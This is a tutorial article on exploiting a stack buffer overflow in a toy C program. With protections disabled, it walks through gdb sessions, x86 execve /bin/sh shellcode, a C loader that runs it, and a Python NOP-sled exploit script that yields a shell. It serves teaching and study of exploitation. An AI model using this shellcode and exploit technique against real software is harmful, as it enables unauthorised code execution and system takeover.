Buffer Overflow: Code Execution By Shellcode Injection

By this third article of the Buffer Overflow series we should be familiar with:

  • buffer,
  • memory segmentation,
  • buffer overflow,
  • gdb,
  • assembly and disassembly

In this article we will detail how to exploit a buffer overflow in order to achieve arbitrary code execution via shellcode injection.

Setting up our environment

As previously stated in the introduction, today’s memory layout of a running application has become significantly more complex due to the implementation of various security measures. These measures have made exploiting vulnerabilities such as buffer overflow quite challenging. Some of the common and highly effective security measures include for example:

  • ASLR protection (Address Space Layout Randomization) randomly arranges the address space positions of key data areas of a program. At each new execution, the stored data is placed at different memory addresses.
  • SSP protection (Stack-Smashing Protector) detects stack buffer overruns by aborting if a secret value on the stack is changed. These secret values (“canaries”) are inserted between the local buffers and the saved control data on the stack. The integrity of the canaries is checked before a function returns, and the program immediately aborts if a modification is detected.
  • Non-executable stack and heap (NX): these memory regions are intended to only contain data such as variables and pointers, never executable code, so the CPU refuses to execute instructions located there.

For the learning purpose of our example, we are going to disable these protections and force a 32-bit compilation.

[hg8@archbook ~]$ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space # disable ASLR
[hg8@archbook ~]$ gcc -m32 -g -mpreferred-stack-boundary=2 -fno-stack-protector -z execstack vuln.c -o vuln

Flags explanation:

-m32: Compile as a 32-bit binary.

-g: Generates debug information to be used by the GDB debugger.

-mpreferred-stack-boundary=2: Ensures that the stack is aligned on 4-byte boundaries, preventing alignment padding that could make our example confusing.

-fno-stack-protector: Disable Stack Smashing protection.

-z execstack: Disable NX (allowing stack segment to be executable).
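
To double-check that the ASLR setting took effect, the value can be read back from the same /proc file. The following is a minimal Python sketch: the helper names are made up for illustration, and the meaning of the values 0, 1 and 2 is taken from the Linux kernel sysctl documentation rather than from this article.

```python
from pathlib import Path

# Meaning of the values stored in /proc/sys/kernel/randomize_va_space
# (per the Linux kernel sysctl documentation).
ASLR_MODES = {
    0: "disabled",
    1: "stack, mmap base and vDSO randomized",
    2: "stack, mmap base, vDSO and heap (brk) randomized",
}

def describe_aslr(raw: str) -> str:
    """Translate the raw file content (for example '0') into a description."""
    return ASLR_MODES.get(int(raw.strip()), "unknown mode")

def current_aslr(path: str = "/proc/sys/kernel/randomize_va_space"):
    """Return the description for this machine, or None if it cannot be read."""
    try:
        return describe_aslr(Path(path).read_text())
    except (OSError, ValueError):
        return None

print(current_aslr())
```

After running the echo command above, this should report "disabled" on a Linux machine.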

Overflowing the stack

Let’s now open our program with gdb:

[hg8@archbook ~]$ gdb ./vuln
Reading symbols from ./vuln...
(gdb) list
1 #include <string.h>
2
3 int main (int argc, char** argv) {
4 char buffer [500];
5 strcpy(buffer, argv[1]);
6 return 0;
7 }
(gdb)

In the previous article, the disassembly of our example program allowed us to understand what our program’s stack will look like:

[Figure: memory segmentation representation]

In order to exploit the buffer overflow in our program, we are going to pass an input bigger than 500 characters to our buffer[] variable.

It’s important to note that, even though the stack itself grows downward, from higher to lower memory addresses, the buffer itself is filled from lower to higher memory addresses.

In our example, when we input a string longer than 500 characters, it will begin overwriting the saved register values that sit just after the buffer (lower on the stack, and higher up in memory).

For example, if we use a 501-character input, the following will happen:

[Figure: memory representation buffer overflow]

Let’s now see in practice what happens when we input a 501-character string to our program.

We can use python to generate a string made of 501 occurrences of the letter ‘A’ (0x41 is hexadecimal for 65, which is the ASCII-code for the letter ‘A’).

From gdb this can be done using the run command:

[hg8@archbook ~]$ gdb ./vuln
Reading symbols from vuln...
(gdb) run $(python -c "print('\x41'*501)")
[Inferior 1 (process 3508) exited normally]

Nothing visible happens. This is expected: the extra bytes only spill into the saved copy of EBX, which is not a critical register in our example program.

Let’s now add a breakpoint in order to highlight how the EBX register got overwritten with an extra 0x41 (’A’):

(gdb) disassemble main
Dump of assembler code for function main:
0x08049176 <+0>: push ebp
0x08049177 <+1>: mov ebp,esp
0x08049179 <+3>: push ebx
0x0804917a <+4>: sub esp,0x1f4
0x08049180 <+10>: call 0x80491ae <__x86.get_pc_thunk.ax>
0x08049185 <+15>: add eax,0x2053
0x0804918a <+20>: mov edx,DWORD PTR [ebp+0xc]
0x0804918d <+23>: add edx,0x4
0x08049190 <+26>: mov edx,DWORD PTR [edx]
0x08049192 <+28>: push edx
0x08049193 <+29>: lea edx,[ebp-0x1f8]
0x08049199 <+35>: push edx
0x0804919a <+36>: mov ebx,eax
0x0804919c <+38>: call 0x8049050 <strcpy@plt>
0x080491a1 <+43>: add esp,0x8
0x080491a4 <+46>: mov eax,0x0
0x080491a9 <+51>: mov ebx,DWORD PTR [ebp-0x4]
0x080491ac <+54>: leave
0x080491ad <+55>: ret
End of assembler dump.
(gdb) break *0x080491ac
Breakpoint 1 at 0x80491ac: file vuln.c, line 7.
(gdb) run $(python -c "print('\x41'*501)")
Starting program: ./vuln $(python -c "print('\x41'*501)")

Breakpoint 1, 0x080491ac in main (argc=2, argv=0xffffd0b4) at vuln.c:7
7 }
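
The positions of the saved values relative to the start of the buffer can be worked out from the disassembly above. The short Python sketch below does that arithmetic; the dictionary names are only illustrative, and the positions of the saved ebp and return address assume the standard frame created by `push ebp; mov ebp,esp`.

```python
# Offsets relative to ebp, read from the disassembly of main:
#   lea edx,[ebp-0x1f8]          -> buffer starts at ebp-0x1f8
#   mov ebx,DWORD PTR [ebp-0x4]  -> saved ebx lives at ebp-0x4
# The saved ebp sits at ebp+0 and the return address at ebp+4
# (standard frame after `push ebp; mov ebp,esp`).
BUFFER = -0x1F8
SLOTS = {"saved ebx": -0x4, "saved ebp": 0x0, "return address": 0x4}

# Distance of each slot from the first byte of the buffer.
offsets = {name: pos - BUFFER for name, pos in SLOTS.items()}
for name, off in offsets.items():
    print(f"{name}: payload bytes {off}..{off + 3}")
```

This gives 500 for the saved ebx, 504 for the saved ebp and 508 for the return address, which is why byte number 501 of our input is the first one to touch ebx.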

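Now, by checking the registers with the info registers command, we can verify that the value of ebx has been overwritten. Its lowest byte is now 0x41, and the next byte is 0x00 because strcpy also copies the string’s terminating null byte: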

(gdb) info registers
[...]
ebx 0xf7fa0041 -134610879
[..]
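
To see where a value like 0xf7fa0041 comes from, here is a small Python model of what strcpy does to the stack frame. It is only a sketch: the function name is made up, and the original ebx value 0xf7fa0ff4 is a hypothetical placeholder (only its two upper bytes matter for the result).

```python
import struct

BUFFER_SIZE = 500  # char buffer[500] in vuln.c

def simulate_strcpy(arg: bytes, saved_ebx: int, saved_ebp: int, ret_addr: int):
    """Model buffer + saved ebx + saved ebp + return address as one bytearray
    and copy `arg` into it the way strcpy would (terminating NUL included)."""
    frame = bytearray(BUFFER_SIZE) + struct.pack("<III", saved_ebx, saved_ebp, ret_addr)
    data = arg + b"\x00"  # strcpy also copies the terminating NUL byte
    if len(data) > len(frame):
        # Writes past the return address land on the caller's data;
        # grow the model so the copy still fits.
        frame.extend(bytes(len(data) - len(frame)))
    frame[:len(data)] = data
    return struct.unpack_from("<III", frame, BUFFER_SIZE)

# 0xf7fa0ff4 is a hypothetical original value for the saved ebx.
ebx, ebp, ret = simulate_strcpy(b"A" * 501, 0xF7FA0FF4, 0x0, 0xF7DAD119)
print(hex(ebx))  # 0xf7fa0041
```

The 501st ‘A’ replaces the lowest byte of the saved ebx and the NUL terminator replaces the next one, while the two upper bytes keep their original value.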

By inputting a 504-character string, we overwrite the whole ebx register:

(gdb) run $(python -c "print('\x41'*504)")                                                                             
Starting program: ./vuln $(python -c "print('\x41'*504)")

Breakpoint 1, 0x080491ac in main (argc=2, argv=0xffffd0b4) at vuln.c:7
7 }
(gdb) info registers
[...]
ebx 0x41414141 -1094795585
[..]

We can also visualize what the stack looks like in memory from gdb with x/14x $sp+460. Let’s decompose the command to understand how it works:

  • x/14x displays 14 words (4 bytes each) of memory in hexadecimal format.
  • $sp+460 starts the memory reading from the stack pointer ($sp) position offset by +460, which is around where our ebx register is located.
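
To make the word grouping concrete, the following Python sketch formats raw bytes the way the dumps in this article are laid out, as little-endian 4-byte words. The function name and the sample bytes are illustrative only, and the real gdb output separates columns with tabs rather than single spaces.

```python
import struct

def dump_words(data: bytes, base: int, per_line: int = 4) -> list[str]:
    """Format bytes as little-endian 32-bit words, four per line."""
    count = len(data) // 4
    words = struct.unpack(f"<{count}I", data[: count * 4])
    lines = []
    for i in range(0, len(words), per_line):
        row = " ".join(f"0x{w:08x}" for w in words[i : i + per_line])
        lines.append(f"0x{base + 4 * i:08x}: {row}")
    return lines

# Four 'A' bytes followed by the bytes 01 02 03 04, at a sample address.
for line in dump_words(b"AAAA" + b"\x01\x02\x03\x04", 0xFFFFCFBC):
    print(line)  # 0xffffcfbc: 0x41414141 0x04030201
```

Note how the bytes 01 02 03 04 are displayed as 0x04030201: each word is shown with its bytes in reverse order because x86 is little endian.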

Beforehand, let’s slightly tweak our payload to make it more visible in the stack representation: instead of ‘A’, we will use ‘B’ (0x42) for the 4 overflowing bytes:

(gdb) run $(python -c "print('\x41'*500+'\x42'*4)") 
Starting program: ./vuln $(python -c "print('\x41'*500+'\x42'*4)")

Breakpoint 1, 0x080491ac in main (argc=2, argv=0xffffd0b4) at vuln.c:7
7 }
(gdb) x/14x $sp+460
0xffffcfbc: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffcfcc: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffcfdc: 0x41414141 0x41414141 0x42424242 0x00000000
0xffffcfec: 0xf7dad119 0x00000002

Now let’s overwrite every saved value following our buffer: the saved ebx with ‘BBBB’, the saved ebp with ‘CCCC’ and the return address (which ends up in eip) with ‘DDDD’:

(gdb) run $(python -c "print('\x41'*500+'\x42'*4+'\x43'*4+'\x44'*4)") 

Program received signal SIGSEGV, Segmentation fault.
0x44444444 in ?? ()
(gdb) info registers
[...]
ebx 0x42424242 1111638594
esp 0xffffcff0 0xffffcff0
ebp 0x43434343 0x43434343
esi 0x804b0e0 134525152
edi 0xf7ffcb80 -134231168
eip 0x44444444 0x44444444
[...]
(gdb) x/14x $sp+460
0xffffcfbc: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffcfcc: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffcfdc: 0x41414141 0x41414141 0x42424242 0x43434343
0xffffcfec: 0x44444444 0x00000000

Our stack now looks like this:

[Figure: memory buffer overflow payload injection]

We now fully control the saved register values adjacent to our buffer. So what can we do with this control? Let’s move on to exploitation.

Exploitation

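The last register we managed to overwrite is eip.

The EIP register is the “Extended Instruction Pointer”. It holds the address of the next instruction to execute and therefore controls the flow of the program. When main returns, the ret instruction pops the saved return address from the stack into eip, which is why overwriting that saved value lets us choose where execution continues.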

This means that if we can input malicious code into the program, we can use the buffer overflow to overwrite the eip register to point to the memory address of the malicious code.
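
The way the overwritten stack values end up in the registers can be traced with a tiny Python model of the `leave; ret` epilogue. This is an illustrative sketch, not an emulator: the function name is made up, and the addresses are the ones from the crash dump shown earlier (saved ebp at 0xffffcfe8, return address at 0xffffcfec).

```python
import struct

def leave_ret(memory: bytes, base: int, ebp: int):
    """Emulate `leave; ret` on a little-endian 32-bit stack snapshot.

    `memory` holds the bytes starting at address `base`.
    Returns the resulting (esp, ebp, eip).
    """
    def read32(addr: int) -> int:
        return struct.unpack_from("<I", memory, addr - base)[0]

    esp = ebp            # leave: mov esp, ebp
    ebp = read32(esp)    # leave: pop ebp
    esp += 4
    eip = read32(esp)    # ret: pop the return address into eip
    esp += 4
    return esp, ebp, eip

# Saved ebp ('CCCC') followed by the return address ('DDDD').
snapshot = b"CCCC" + b"DDDD"
esp, ebp, eip = leave_ret(snapshot, base=0xFFFFCFE8, ebp=0xFFFFCFE8)
print(hex(esp), hex(ebp), hex(eip))  # 0xffffcff0 0x43434343 0x44444444
```

The three values match the esp, ebp and eip reported by info registers after the segmentation fault.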

And that’s exactly what we are going to do now, and we will start by crafting a shellcode.

Shellcode Creation

First of all, what is shellcode?

A shellcode is a small piece of code used as payload when exploiting an overflow vulnerability. Historically it’s called “shellcode” because it typically starts a command shell from which the attacker can control the compromised machine.

In our case, we will inject a shellcode into our buffer so that it gets executed later on.
Wikipedia describes the writing of shellcode “as much of an art as it is a science”, since shellcode depends on the operating system and CPU architecture, and is commonly written in assembly.

Plenty of ready-made shellcodes can easily be found on the internet. For our example we are going to use a very common and simple shellcode for x86 which executes a /bin/sh shell.

Here is a quick overview of this shellcode:

xor eax, eax      ; put 0 into eax
push eax ; push 4 bytes of null from eax to the stack
push 0x68732f2f ; push "//sh" to the stack
push 0x6e69622f ; push "/bin" to the stack
mov ebx, esp ; put the address of "/bin//sh" to ebx, via esp
push eax ; push 4 bytes of null from eax to the stack
push ebx ; push ebx to the stack
mov ecx, esp ; put the address of the argument array [ebx, NULL] into ecx, via esp
mov al, 0xb ; put 11 into eax, since execve() is syscall #11
int 0x80 ; call the kernel to make the syscall happen
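
The two magic constants are simply the path string stored in little-endian order. The Python sketch below rebuilds what the first three pushes leave on the stack; the variable names are illustrative.

```python
import struct

# Each push stores a 32-bit value in little-endian byte order, and the stack
# grows downward, so the value pushed last ends up at the lowest address.
pushes = [0x00000000, 0x68732F2F, 0x6E69622F]  # in program order

stack = b""
for value in pushes:
    stack = struct.pack("<I", value) + stack  # newest push goes in front

print(stack)  # b'/bin//sh\x00\x00\x00\x00'
```

Read from esp upward, the stack therefore contains the NUL-terminated string "/bin//sh". The doubled slash is harmless and keeps the string length a multiple of 4 bytes.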

This code can be assembled using nasm into a 32-bit object file in the Executable and Linking Format (ELF). No linking is needed, since we only want the raw instruction bytes:

[hg8@archbook ~]$ nasm -f elf shellcode.asm

Now we need to disassemble it in order to get the shellcode bytes:

[hg8@archbook ~]$ objdump -d -M intel shellcode.o

shellcode.o: file format elf32-i386

Disassembly of section .text:

00000000 <.text>:
0: 31 c0 xor eax,eax
2: 50 push eax
3: 68 2f 2f 73 68 push 0x68732f2f
8: 68 2f 62 69 6e push 0x6e69622f
d: 89 e3 mov ebx,esp
f: 50 push eax
10: 53 push ebx
11: 89 e1 mov ecx,esp
13: b0 0b mov al,0xb
15: cd 80 int 0x80
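
The opcode bytes can also be collected programmatically from a listing like the one above. The following Python sketch is one possible way to do it; the function name is made up, and the parser assumes that no mnemonic in the listing looks like a two-digit hexadecimal byte, which holds for this shellcode.

```python
import re

LISTING = """\
0: 31 c0 xor eax,eax
2: 50 push eax
3: 68 2f 2f 73 68 push 0x68732f2f
8: 68 2f 62 69 6e push 0x6e69622f
d: 89 e3 mov ebx,esp
f: 50 push eax
10: 53 push ebx
11: 89 e1 mov ecx,esp
13: b0 0b mov al,0xb
15: cd 80 int 0x80
"""

def extract_bytes(listing: str) -> bytes:
    """Collect the opcode bytes from `objdump -d` style lines."""
    out = bytearray()
    for line in listing.splitlines():
        match = re.match(r"\s*[0-9a-f]+:\s+(.*)", line)
        if not match:
            continue  # header or blank line
        for token in match.group(1).split():
            if not re.fullmatch(r"[0-9a-f]{2}", token):
                break  # reached the mnemonic
            out.append(int(token, 16))
    return bytes(out)

shellcode = extract_bytes(LISTING)
print("".join(f"\\x{b:02x}" for b in shellcode))
print(len(shellcode))  # 23
```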

We can now easily extract the hexadecimal shellcode, either by hand or with some bash-fu:

[hg8@archbook ~]$ objdump -d ./shellcode.o|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"

Shellcode Testing

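Now, to be sure our shellcode works, let’s write a simple program to run it on our machine. Note that the bytes used from here on are a slightly different, 25-byte variant of the same execve shellcode: it pushes the path as "//bin/sh" and also points edx at a null word before the system call: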

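#include <stdio.h>
#include <string.h>

int main(void) {
    /* The shellcode is stored in a stack array, hence -z execstack below. */
    char shellcode[] = "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
    /* Treat the array as a function and call it. */
    int (*ret)(void) = (int (*)(void))shellcode;
    return ret();
}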

Let’s run it:

[hg8@archbook ~]$ gcc -m32 -z execstack shellcode-loader.c -o shellcode-loader
[hg8@archbook ~]$ ./shellcode-loader
sh-5.1$

All is good, let’s now inject the shellcode into our vulnerable program.
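
Before injecting it, it can be worth checking that the shellcode contains no byte that would cut the payload short. The sketch below is a hedged example of such a check: the helper name and the list of bad bytes are assumptions based on how the payload is delivered in this article (through strcpy, and through an unquoted `$(...)` substitution with the shell’s default IFS).

```python
shellcode = (
    b"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69"
    b"\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
)

# strcpy() stops at the first NUL byte; the shell splits $(...) output on
# space, tab and newline (default IFS), which would break the single argument.
BAD_BYTES = {0x00: "NUL", 0x20: "space", 0x09: "tab", 0x0A: "newline"}

def find_bad_bytes(payload: bytes) -> list[tuple[int, str]]:
    """Return (offset, name) for every problematic byte in the payload."""
    return [(i, BAD_BYTES[b]) for i, b in enumerate(payload) if b in BAD_BYTES]

print(len(shellcode), find_bad_bytes(shellcode))  # 25 []
```

This is also why the shellcode zeroes eax with `xor eax, eax` instead of moving a literal 0 into it: the latter would put NUL bytes in the instruction stream.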

Shellcode Injection

We now need to make our vulnerable program execute our shellcode. To do so we will inject the shellcode in the input data payload, for it to be stored in our buffer.

The next step will be to have our return address point to the memory location where our shellcode is stored in order for it to be executed.

Since stack addresses can shift slightly between runs (for example when environment variables or the argument length change) and we don’t know the exact location of our shellcode, we will use the NOP-sled technique.

NOP-sled

A NOP sled, also known as a NOP slide, is a technique used to help ensure that a shellcode is executed even if the exact memory location of the exploit payload is not known.

The NOP, or No-Operation, instruction is a machine language instruction that performs no operation and takes up one machine cycle. NOP sled takes advantage of this instruction by creating a sequence of NOP instructions that can serve as a landing pad for the program execution flow.

We will craft a sequence of NOP instructions followed by our shellcode. The idea is that if the execution flow is redirected to any point within the NOP sled, the CPU will execute the NOP instructions and keep moving forward until it hits the shellcode.
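
The sliding behaviour can be illustrated with a toy Python model. It is not an emulator: it only walks over 0x90 bytes from a chosen landing offset, and the 16-byte sled length is an arbitrary value picked for the example.

```python
NOP = 0x90

def slide(payload: bytes, landing: int) -> int:
    """Return the offset where execution stops sliding over NOPs."""
    pos = landing
    while pos < len(payload) and payload[pos] == NOP:
        pos += 1  # a NOP does nothing except advance to the next byte
    return pos

SLED_LEN = 16                                    # arbitrary, for illustration
payload = bytes([NOP]) * SLED_LEN + b"\x31\xc0"  # sled + first shellcode bytes

# Whatever the landing offset inside the sled, we end up on the shellcode.
print({slide(payload, start) for start in range(SLED_LEN)})  # {16}
```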

When utilizing a NOP-sled, the precise location of the shellcode within the buffer doesn’t matter for the return address to reach it. What we do know is that it will reside somewhere within the buffer, and its length will be 25 bytes.

With our shellcode of 25 bytes and a payload of 512 bytes, we have 487 bytes left for the NOP sled and the repeated return address, which we will lay out like so:

Payload: [ NOP SLED] [ SHELLCODE ] [ RETURN ADDRESS ]

Crafting our exploit

We will use a Python script to craft our exploit. Since we use Python 3, it’s important to build the payload with the bytes type and write it to stdout unencoded.

In addition, since we are working on x86, the hexadecimal value for NOP instructions is 0x90.

import sys

shellcode = b"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
eip = b"\x43\x43\x43\x43" * 10
nop = b"\x90" * 447
buff = nop + shellcode + eip

sys.stdout.buffer.write(buff)

Since we don’t know yet what the return address (eip) will be, we temporarily replace it with ‘C’ (0x43). We repeat it 10 times to leave a bit of padding between our shellcode and the top of the stack, so that the values pushed by the shellcode do not overwrite its own instructions.

Our NOP instruction is repeated 447 times, since we need to write 512 bytes in total to overwrite the return address:

512        - (4 * 10) -     25    =     447
Total size - eip - shellcode = nop sled.
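
The same arithmetic can be checked in Python before running anything. In this sketch the offset 508 is derived from the layout seen earlier (500-byte buffer, then 4 bytes of saved ebx and 4 bytes of saved ebp); the variable names are illustrative.

```python
shellcode = (
    b"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69"
    b"\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
)
placeholder = b"\x43\x43\x43\x43" * 10            # stands in for the address
nop = b"\x90" * (512 - len(placeholder) - len(shellcode))
buff = nop + shellcode + placeholder

RET_OFFSET = 508  # 500-byte buffer + saved ebx (4) + saved ebp (4)

# The repeated address only lines up with the return address slot if the
# bytes in front of it are a multiple of 4.
assert (len(nop) + len(shellcode)) % 4 == 0

print(len(nop), len(buff), buff[RET_OFFSET:RET_OFFSET + 4])  # 447 512 b'CCCC'
```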

Here is what we expect our memory to look like after execution of our payload:

[Figure: Stack Overflowed shellcode injection]

Let’s run our payload:

[hg8@archbook ~]$ gdb ./vuln
Reading symbols from vuln...
(gdb) run $(python exploit-test.py)
Using host libthread_db library "/usr/lib/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
0x43434343 in ?? ()

We get exactly what we were looking for: a segmentation fault, since we didn’t provide a valid return address yet. Let’s now inspect our memory to determine what the return address should be.

When inspecting the memory, we can see our payload was injected as expected:

[Screenshot: buffer overflow memory inspection]

Let’s now pick any memory address within the 0x90 NOP sled area before the shellcode to be our return address. From the screenshot above we can pick 0xffffce30 for example.

Since Intel CPUs are little endian, we need to reverse the address for our payload.
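
Reversing the address means storing its bytes from least significant to most significant. Rather than doing it by hand, Python’s struct module can do the conversion, as in this minimal sketch:

```python
import struct

address = 0xFFFFCE30                 # address picked inside the NOP sled
packed = struct.pack("<I", address)  # "<I" = little-endian unsigned 32-bit

print(packed.hex())  # 30ceffff
```

The resulting bytes are the same as the literal b"\x30\xce\xff\xff" used in the script.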

Our script becomes:

import sys

shellcode = b"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
eip = b"\x30\xce\xff\xff" * 10
nop = b"\x90" * 447
buff = nop + shellcode + eip

sys.stdout.buffer.write(buff)

If everything goes fine, strcpy will copy our string and, when main tries to return, it will load our injected return address, redirecting execution to the NOP sled and then to the shellcode.

Let’s give it a try:

[hg8@archbook ~]$ gdb ./vuln
(gdb) run $(python exploit.py)

Using host libthread_db library "/usr/lib/libthread_db.so.1".
process 6722 is executing new program: /usr/bin/bash
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".
sh-5.1$

And here we go! The buffer overflow was successfully exploited, resulting in obtaining access to a command shell.
